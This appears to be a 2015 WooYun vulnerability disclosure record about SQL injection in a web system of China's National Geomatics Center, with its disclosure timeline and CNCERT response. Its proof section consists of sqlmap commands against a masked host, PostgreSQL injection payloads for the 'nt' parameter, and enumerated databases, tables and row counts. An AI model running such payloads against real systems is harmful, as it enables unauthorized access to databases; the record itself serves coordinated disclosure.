当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142750

漏洞标题:国家基础地理信息中心某系统存在注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-24 23:17

修复时间:2015-11-13 10:12

公开时间:2015-11-13 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

国家基础地理信息中心某系统存在注入漏洞 可泄露国家地理信息

详细说明:

漏洞证明:

root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" --dbs --batch

available databases [5]:
[*] information_schema
[*] pg_catalog
[*] public
[*] tiger
[*] topology


root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" --current-db --batch

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: nt
    Type: boolean-based blind
    Title: PostgreSQL stacked conditional-error blind queries
    Payload: nt=-8996'; SELECT (CASE WHEN (3276=3276) THEN 3276 ELSE 1/(SELECT 0) END)--&id=2
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: nt=CONTENT_TYPE_2' AND 2997=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2997=2997) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(109)||CHR(99)||CHR(122)||CHR(113)) AS NUMERIC) AND 'gNBR'='gNBR&id=2
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: nt=CONTENT_TYPE_2' UNION ALL SELECT NULL,NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(113)||CHR(113))||(CHR(84)||CHR(66)||CHR(80)||CHR(101)||CHR(100)||CHR(115)||CHR(105)||CHR(80)||CHR(100)||CHR(116))||(CHR(113)||CHR(109)||CHR(99)||CHR(122)||CHR(113)),NULL,NULL,NULL,NULL,NULL-- &id=2
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries
    Payload: nt=CONTENT_TYPE_2'; SELECT PG_SLEEP(5)--&id=2
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: nt=CONTENT_TYPE_2' AND 4175=(SELECT 4175 FROM PG_SLEEP(5)) AND 'Qbrl'='Qbrl&id=2
current schema (equivalent to database on PostgreSQL):    'public'


Database: pg_catalog
[51 tables]
+-------------------------+
| pg_aggregate            |
| pg_am                   |
| pg_amop                 |
| pg_amproc               |
| pg_attrdef              |
| pg_attribute            |
| pg_auth_members         |
| pg_authid               |
| pg_cast                 |
| pg_class                |
| pg_collation            |
| pg_constraint           |
| pg_conversion           |
| pg_database             |
| pg_db_role_setting      |
| pg_default_acl          |
| pg_depend               |
| pg_description          |
| pg_enum                 |
| pg_event_trigger        |
| pg_extension            |
| pg_foreign_data_wrapper |
| pg_foreign_server       |
| pg_foreign_table        |
| pg_index                |
| pg_inherits             |
| pg_language             |
| pg_largeobject          |
| pg_largeobject_metadata |
| pg_namespace            |
| pg_opclass              |
| pg_operator             |
| pg_opfamily             |
| pg_pltemplate           |
| pg_proc                 |
| pg_range                |
| pg_rewrite              |
| pg_seclabel             |
| pg_shdepend             |
| pg_shdescription        |
| pg_shseclabel           |
| pg_statistic            |
| pg_tablespace           |
| pg_trigger              |
| pg_ts_config            |
| pg_ts_config_map        |
| pg_ts_dict              |
| pg_ts_parser            |
| pg_ts_template          |
| pg_type                 |
| pg_user_mapping         |
+-------------------------+


root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" -D pg_catalog --count --batch
Database: pg_catalog
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| pg_largeobject | 190911 |
| pg_depend | 14711 |
| pg_attribute | 12446 |
| pg_largeobject_metadata | 10609 |
| pg_description | 4242 |
| pg_proc | 3837 |
| pg_statistic | 3165 |
| pg_class | 1191 |
| pg_type | 1144 |
| pg_operator | 779 |
| pg_index | 474 |
| pg_amop | 430 |
| pg_attrdef | 373 |
| pg_amproc | 316 |
| pg_ts_config_map | 304 |
| pg_cast | 224 |
| pg_constraint | 222 |
| pg_aggregate | 137 |
| pg_conversion | 132 |
| pg_rewrite | 127 |
| pg_opclass | 126 |
| pg_opfamily | 83 |
| pg_trigger | 45 |
| pg_ts_config | 16 |
| pg_ts_dict | 16 |
| pg_namespace | 9 |
| pg_pltemplate | 8 |
| pg_extension | 7 |
| pg_range | 6 |
| pg_am | 5 |
| pg_ts_template | 5 |
| pg_database | 4 |
| pg_language | 4 |
| pg_collation | 3 |
| pg_shdescription | 3 |
| pg_tablespace | 2 |
| pg_authid | 1 |
| pg_db_role_setting | 1 |
| pg_shdepend | 1 |
| pg_ts_parser | 1 |
+-------------------------+---------+
可跨裤
root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" -D tiger --count --batch

Database: tiger
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| pagc_rules            | 4353    |
| pagc_lex              | 2935    |
| pagc_gaz              | 835     |
| street_type_lookup    | 609     |
| state_lookup          | 59      |
| secondary_unit_lookup | 39      |
| direction_lookup      | 28      |
| loader_lookuptables   | 13      |
| geocode_settings      | 6       |
| loader_platform       | 2       |
| loader_variables      | 1       |
+-----------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 10:11

厂商回复:


CNVD确认并复现所述漏洞情况,已经转由CNCERT下发北京分中心,由其后续尝试协调网站管理单位处置。

最新状态:

暂无